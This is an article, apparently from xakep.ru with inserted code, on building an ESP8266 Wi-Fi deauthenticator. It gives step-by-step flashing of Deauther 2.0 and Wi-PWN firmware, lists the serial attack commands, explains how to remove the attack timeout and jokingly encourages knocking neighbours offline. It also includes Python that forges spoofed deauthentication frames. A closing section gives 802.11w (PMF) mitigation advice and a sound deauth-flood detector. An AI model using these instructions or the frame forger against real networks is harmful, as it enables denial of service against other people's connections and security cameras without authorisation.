Extinguish the wave! Select and configure the hardware Wi-Fi deauthenticator on ESP8266.



Hello, everyone running in the shadows! Hello, random subscriber. Today we will talk about a neat thing: the Wi-Fi jammer, or, more precisely, the Wi-Fi deauthenticator. This is a gadget designed to kick wireless devices off an access point. Why would anyone need it? You can imagine a friendly prank (your neighbor will surely be delighted when you cut off his porn or a football match at the most interesting moment) as well as criminal use: an attacker can disconnect security cameras or other important equipment from the network. In this article we will look at which inexpensive hardware deauthenticators are available, how to use them, and how to protect yourself from such attacks.

Let's go.

How the jammer works

Unlike a real jammer, which drowns out the radio channel with a stronger signal of its own, the deauthenticator works at the protocol level. It carries out a denial-of-service attack by sending forged 802.11 deauthentication frames: to the client on behalf of the access point, and to the access point on behalf of the client. In networks without 802.11w, management frames are neither encrypted nor authenticated, so the jammer only needs to learn the MAC addresses of the access point and its clients, which it does by sniffing the air in promiscuous mode; it never needs the Wi-Fi password.

Usually, deauthentication is one step of a larger attack on the network: it is used to push clients onto an "evil twin" access point, or to force a reconnect so that the WPA handshake can be captured and the password then cracked offline. But a jammer can also be useful on its own.
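To make the mechanism concrete, here is an added example (my own code, not taken from the article or from any of the firmware discussed) that builds the raw 802.11 deauthentication frame a deauther transmits and decodes it back. The MAC addresses in it are made up. The point to notice is that the frame is a handful of plain little-endian fields with no key, nonce or signature anywhere, so anyone who knows two MAC addresses can produce a frame the receiver cannot distinguish from a genuine one.

```python
import struct

# 802.11 frame-control fields (IEEE 802.11-2016, section 9.2.4.1)
TYPE_MGMT = 0
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
FC_PROTECTED = 0x4000        # "Protected Frame" bit; set only on 802.11w-protected management frames

# A few reason codes (section 9.4.1.7); deauthers usually pick one of these
REASON_UNSPECIFIED = 1
REASON_PREV_AUTH_INVALID = 2
REASON_STA_LEAVING = 3
REASON_CLASS3_FROM_NONASSOC = 7


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, reason: int = REASON_UNSPECIFIED,
                 seq: int = 0, subtype: int = SUBTYPE_DEAUTH) -> bytes:
    """Build a deauthentication (or disassociation) management frame without FCS.

    Layout: frame control (2) | duration (2) | addr1=DA (6) | addr2=SA (6) |
            addr3=BSSID (6) | sequence control (2) | reason code (2).
    Everything is little-endian and nothing is encrypted or signed, which is
    exactly why a third party can forge it.
    """
    frame_control = (subtype << 4) | (TYPE_MGMT << 2)   # protocol version 0, no flags
    seq_ctrl = seq << 4                                   # fragment number 0
    return struct.pack("<HH6s6s6sHH", frame_control, 0,
                       mac_to_bytes(dst), mac_to_bytes(src), mac_to_bytes(bssid),
                       seq_ctrl, reason)


def parse_mgmt(frame: bytes) -> dict:
    """Decode the 24-byte management header; the body is returned raw."""
    fc, _duration, a1, a2, a3, sc = struct.unpack("<HH6s6s6sH", frame[:24])
    return {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "protected": bool(fc & FC_PROTECTED),
        "dst": bytes_to_mac(a1),
        "src": bytes_to_mac(a2),
        "bssid": bytes_to_mac(a3),
        "seq": sc >> 4,
        "body": frame[24:],
    }


def deauth_pair(ap: str, sta: str, reason: int = REASON_UNSPECIFIED, seq: int = 0):
    """The two frames a deauther sends per client: one pretending to be the AP
    telling the client to leave, and one pretending to be the client telling the AP."""
    to_client = build_deauth(dst=sta, src=ap, bssid=ap, reason=reason, seq=seq)
    to_ap = build_deauth(dst=ap, src=sta, bssid=ap, reason=reason, seq=seq)
    return to_client, to_ap


if __name__ == "__main__":
    # Made-up addresses for illustration only
    AP, STA = "de:ad:be:ef:00:01", "ca:fe:ba:be:00:02"
    for f in deauth_pair(AP, STA, REASON_CLASS3_FROM_NONASSOC, seq=42):
        print(f.hex(), parse_mgmt(f))
```

The FCS is left off because the radio appends it; a deauther's firmware hands exactly this kind of buffer to the chip's raw-send function. With 802.11w the same frame would carry the Protected bit and a MIC the attacker cannot compute, and the receiver drops anything that lacks them.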

WARNING

We strongly recommend that you use all of these tips for educational purposes only. Disrupting data transmission and using the tools discussed here may be prosecuted under the law. To carry out a penetration test you need written authorization from the customer. Remember that deauthentication events are written to the router logs. Simply put, cyber-hooligans: don't get caught. If you are caught, you won't live to see the trial.

Recently, inexpensive and miniature NodeMCU boards have become very popular. They are built around the ESP8266 module, which implements Wi-Fi according to 802.11 b/g/n in the 2.4 GHz band. Two variants of these boards are common, differing only in the USB-to-serial bridge chip: the CP2102 from the American company Silicon Labs or the Chinese CH340. The bridge only determines which driver you install; the Wi-Fi part is identical.



These boards are positioned as devices for prototyping: on their basis, craftsmen create automated systems controlled via Wi-Fi. The topic itself is quite exciting, but we are now interested in something else — the possibility of using NodeMCU to conduct attacks.

The ESP8266 is unsuitable for full-fledged monitoring and packet injection because of technical limitations (it can sniff in promiscuous mode and send raw frames, but not with the freedom a proper monitor-mode adapter gives you), yet that is enough to use it as a deauthenticator, which is why the corresponding firmware appeared. Last year a good person with the pseudonym Spacehuhn released the first of them, and since then other versions with additional features have appeared. However, before moving on to software, let's decide on the hardware.

This article demonstrates the process on a board from the Chinese manufacturer Dstike: it carries an ESP8266 and can work both as a client (station mode) and as an access point (soft-AP). You can control the board from a smartphone or any other device with Wi-Fi.

Important! The firmware works the same regardless of the bridge chip or the board, so choose whichever you like. Dstike alone offers several variants in different versions for different situations. They all have one thing in common: the ability to jam networks.

Types of Dstike devices

Deauther Wristband - a wristband with a built-in display, battery and switch. Convenient device for quick access to the control panel.



Deauther Power Bank - with a modified charge controller; control is carried out through a special panel. The controller has a connector for connecting an external antenna. Batteries are not included. This is an inconspicuous device that you can easily leave somewhere and use remotely.



Deauther OLED V3.5 - in this version you additionally get a connector for an external antenna and a holder for an 18650 battery. The device is controlled with buttons and a switch, and the output goes to the screen, so this version can be used without any additional equipment.



The main advantage of these gadgets is the ability to target a specific network or all networks within range at once. And note: you do not need the Wi-Fi password to carry out the attacks!

Installing Deauther 2.0

Let's start with Deauther 2.0, the same firmware that Spacehuhn developed. In its GitHub repository, you can choose the version for a specific board.

Files with the .bin extension are compiled sketches; they are written to the board with a flashing tool. If you prefer, the source archives contain the libraries and sketches, which can be uploaded through the Arduino IDE.

Flashing the .bin

If you chose the option with downloading the binary, then first run the NodeMCU Flasher program. You can download it from the NodeMCU repository.

Install the driver for your bridge chip (CP2102 or CH340). Then connect the board to the computer, look up its COM port in Device Manager under "Ports (COM & LPT)", open NodeMCU Flasher and select that port. Now go to the Config tab, click the gear icon and choose the downloaded .bin file.



After adding a file, the path appears in the line to the left. Go to the Operation tab and click on Flash - the firmware will then be loaded into the board.

Uploading via the Arduino IDE

If you find it more convenient to install through the Arduino IDE, the process is slightly different. First install the drivers in the same way (CP2102, CH340). Then open the Arduino IDE, go to File > Preferences, click the button next to "Additional Boards Manager URLs" and paste the two package-index URLs given in the firmware's README. Save everything.

Open the "Tools" tab and select "Board Manager" from the "Board:..." menu.

In the Boards Manager, install the arduino-esp8266-deauther and esp8266 packages.



Open the sketch together with its libraries and go to "Tools". The settings should look like mine in the screenshot.

In the "Board" line, select ESP8266 Deauther Modules from the list.

In the Flash size line, select your module. Set the firmware and memory size as shown in the picture below.



Next, upload the sketch to the board.

After power-up, the board creates its own access point. Connect to it and open 192.168.4.1 or deauth.me in a browser. You will land in the configurator and see a warning.

In the configuration section, set LANG to ru to switch the web interface to Russian. For the settings to take effect, click "Save" and reboot the device. Now it is ready, and you can start making life hard for your neighbors.

Overview of features and settings

Let's take a quick look at the app and see what our board is now capable of.

If you connect the jammer over the serial port, you can control it with commands. You can disable this feature in the settings by unchecking SERIAL.

Commands for serial port control
  • scan [<all/aps/stations>] [-t <time>] [-c <continue-time>] [-ch <channel>]
  • show [selected] [<all/aps/stations/names/ssids>]
  • select [<all/aps/stations/names>] [<id>]
  • deselect [<all/aps/stations/names>] [<id>]
  • add ssid <ssid> [-wpa2] [-cl <clones>]
  • add ssid -ap <id> [-cl <clones>] [-f]
  • add ssid -s [-f]
  • add name <name> [-ap <id>] [-s]
  • add name <name> [-st <id>] [-s]
  • add name <name> [-m <mac>] [-ch <channel>] [-b <bssid>] [-s]
  • set name <id> <newname>
  • enable random <interval>
  • disable random
  • load [<all/ssids/names/settings>] [<file>]
  • save [<all/ssids/names/settings>] [<file>]
  • remove <ap/station/name/ssid> <id>
  • remove <ap/station/names/ssids> [all]
  • attack [beacon] [deauth] [deauthall] [probe] [nooutput] [-t <timeout>]
  • attack status [<on/off>]
  • stop <all/scan/attack>
  • sysinfo
  • clear
  • format
  • print <file> [<lines>]
  • delete <file> [<lineFrom>] [<lineTo>]
  • replace <file> <line> <new-content>
  • copy <file> <newfile>
  • rename <file> <newfile>
  • run <file>
  • write <file> <commands>
  • get <setting>
  • set <setting> <value>
  • reset
  • chicken
  • reboot
  • info
  • // <comments>
  • send deauth <apMac> <stMac> <rason> <channel>
  • send beacon <mac> <ssid> <ch> [wpa2]
  • send probe <mac> <ssid> <ch>
  • led <r> <g> <b> [<brightness>]
  • led <#rrggbb> [<brightness>]
  • led <enable/disable>
  • draw
  • screen <on/off>
  • screen mode <menu/packetmonitor/buttontest/loading>

Attacks stop automatically 600 seconds after they are started. If you don't want that, change the ATTACKTIMEOUT value in the settings: set it to 0 and the attacks will no longer be stopped automatically.

If you click Scan APs in the Scan section, the jammer finds all Wi-Fi access points in range. Select one or more networks and go to the Attacks section. Deauth mode disconnects all devices from the selected networks. Beacon mode lets you advertise up to 60 fake access points at once.

The SSIDs section creates access points for the Beacon attack.

The firmware provides the ability to connect the display — for the version of the device with it. But if you want, you can solder the screen and buttons to the board yourself, as well as provide autonomous power to turn it into an independent device.

The firmware developers, besides the jammer itself, also sell a device that detects it.



The authors periodically update the firmware and add new features, so keep an eye out for updates!

Wi-PWN

Let's look at the similar Wi-PWN firmware, developed by Sam Denty (samdenty99). He built on Spacehuhn's work, added a deauthentication-detector function and wrote a companion Android app. As a result, Wi-PWN is more convenient to use than Deauther 2.0.

After downloading and unpacking the archive, you need to flash the board and install the app on your phone. In the folder you will find the ESP8266Flasher program. Start it, select the COM port and, in the Config tab, the firmware file (it is located at *\Wi-PWN-master\arduino\Wi-PWN). Now click Flash in the Operation tab.

From the phone, connect to the board over Wi-Fi.

Open the downloaded app, agree to the rules, and enter the network name and password. After setting up, we connect to the new Wi-Fi.


Configuring the access point and completing the installation

The app has several tabs with self-explanatory names:
  • Scan - search for and select multiple access points;
  • Users - scan a specific Wi-Fi network for connected clients and create your own "users";
  • Attack - the attacks are the same as in Spacehuhn's version, but when cloning networks the maximum number is 48 instead of 60 (earlier versions of Deauther had the same limit);
  • Detector - scan the channels and detect jammers;
  • Settings - configure the Wi-Fi server (network name, password). Here you can also enable the Wi-Fi client and tune the scan and attack settings.

WARNING

For stable operation, I recommend attaching a heatsink to the part of the device that heats up. Otherwise the jammer may overheat and shut down.

A few words about protection

NodeMCU is a cheap, versatile, powerful and compact deauthentication solution. You can repeat the entire project quickly and without much effort. And since anyone can do it, it's a good idea to think about protection.

Most popular routers use the IEEE 802.11 b/g/n standards without protected management frames, and that is what makes them susceptible to this attack. If you want to rule it out, look for a router that supports 802.11w (Protected Management Frames, PMF). With PMF, deauthentication and disassociation frames are authenticated, so forged ones are discarded. The protection only covers clients that also support 802.11w, and an access point set to "PMF optional" still serves legacy clients unprotected; on a Linux access point built with hostapd the corresponding setting is ieee80211w=2 (required) rather than ieee80211w=1 (optional).

Some routers have flood (DoS) protection, but it usually only applies to devices that are connected to the network, and a Wi-Fi jammer never connects. If your router's protection also covers unassociated devices, we recommend enabling it!
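The detector products mentioned above (Spacehuhn's detector and the Detector tab in Wi-PWN) rely on a simple observation: a legitimate roam or shutdown produces one or two deauthentication frames, while a deauther produces tens per second and keeps going. As an added example (my own code, not from the article or from either firmware), here is that detection logic run over a constructed capture: count unprotected deauthentication/disassociation frames per BSSID in a sliding window and alert when the rate is far above normal. The MAC addresses, timestamps and threshold are made up; in practice you would feed it frames from a monitor-mode interface.

```python
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0x0A, 0x0C
FC_PROTECTED = 0x4000        # 802.11w "Protected Frame" bit in the frame-control field


def mgmt_fields(frame: bytes):
    """Minimal decode of the 802.11 header: (type, subtype, protected, addr1, addr2, addr3)."""
    fc, _dur, a1, a2, a3 = struct.unpack("<HH6s6s6s", frame[:22])
    mac = lambda raw: ":".join(f"{b:02x}" for b in raw)
    return (fc >> 2) & 3, (fc >> 4) & 0xF, bool(fc & FC_PROTECTED), mac(a1), mac(a2), mac(a3)


class DeauthFloodDetector:
    """Counts unprotected deauth/disassoc frames per BSSID in a sliding window.

    Frames with the Protected bit set are ignored: under 802.11w a forged one
    would already have been dropped by the receiver, so only plaintext ones
    can be part of a working attack.
    """

    def __init__(self, window_ms: int = 1000, threshold: int = 10):
        self.window_ms = window_ms      # made-up defaults: 10 frames within 1 s
        self.threshold = threshold
        self.seen = defaultdict(deque)  # bssid -> timestamps (ms) of recent frames

    def feed(self, ts_ms: int, frame: bytes):
        ftype, subtype, protected, dst, src, bssid = mgmt_fields(frame)
        if ftype != TYPE_MGMT or subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) or protected:
            return None
        window = self.seen[bssid]
        window.append(ts_ms)
        while window and ts_ms - window[0] > self.window_ms:   # drop frames older than the window
            window.popleft()
        if len(window) >= self.threshold:
            return {"ts": ts_ms, "bssid": bssid, "src": src, "dst": dst, "count": len(window)}
        return None


def run(capture):
    """Feed (timestamp_ms, frame) pairs in order and collect every alert."""
    det = DeauthFloodDetector()
    alerts = []
    for ts_ms, frame in capture:
        alert = det.feed(ts_ms, frame)
        if alert is not None:
            alerts.append(alert)
    return alerts


def make_sample_capture():
    """Constructed sample, not a real capture: one benign deauth from a client
    that is leaving, then 50 forged broadcast deauths spoofing the AP at 50 per second."""
    ap, sta, bcast = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566"), b"\xff" * 6

    def deauth(dst, src, bssid, seq, reason):
        # frame control 0x00c0 (mgmt/deauth), duration 0, addresses, seq ctrl, reason code
        return b"\xc0\x00\x00\x00" + dst + src + bssid + struct.pack("<HH", seq << 4, reason)

    frames = [(0, deauth(ap, sta, ap, 1, 3))]                                   # reason 3: STA leaving
    frames += [(10000 + 20 * i, deauth(bcast, ap, ap, 100 + i, 7)) for i in range(50)]
    return frames


if __name__ == "__main__":
    alerts = run(make_sample_capture())
    if alerts:
        a = alerts[0]
        print(f"deauth flood on {a['bssid']} spoofing {a['src']}: {a['count']} frames within 1 s at t={a['ts']} ms")
```

The benign frame at the start never triggers anything; the first alert fires on the tenth forged frame and repeats for every frame after that while the window stays full. A real detector would additionally record the channel and signal strength, since a deauther usually sits on one channel and its RSSI does not match that of the access point it is impersonating.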

For those who are in the topic or really want to learn:

A selection of utilities for working with ESP8266, collected by the shadow brothers. Working, working, working.

xakep.ru